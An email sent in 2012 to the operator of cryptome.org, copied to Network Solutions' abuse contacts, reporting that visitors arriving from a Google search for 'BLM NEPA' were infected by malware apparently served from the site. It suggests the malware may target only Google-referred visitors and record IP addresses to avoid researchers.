CC: "'noc[at}networksolutions.com'" <noc[at}networksolutions.com>,
"'abuse[at}networksolutions.com'" <abuse[at}networksolutions.com>
Date: Mon, 12 Mar 2012 12:06:55 -0700
Subject: RE: Infected host at IP 205.178.145.72 cryptome.org
Here is some PRO HELP.
The Sucuri scanner also shows you infected.
[]
We have a log of everything that happened. My user opened a new browser, went
to Google and did a GOOGLE SEARCH for
BLM NEPA
A link from your site comes up as the fourth or fifth hit. My user clicked this
link. Fit hit the shan.
The malware may only present itself when the referer is Google. If you are brave,
perform the same search and click the link from a clean machine ready for malware
reasearch (get your HTTPwatch ready) from a PUBLIC IP THAT HAS NEVER VISITED YOUR
SERVER because these hackers are known to record IPs and dish out malware selectively
to prevent followup security research from IPs of visitors that they try to infect.
|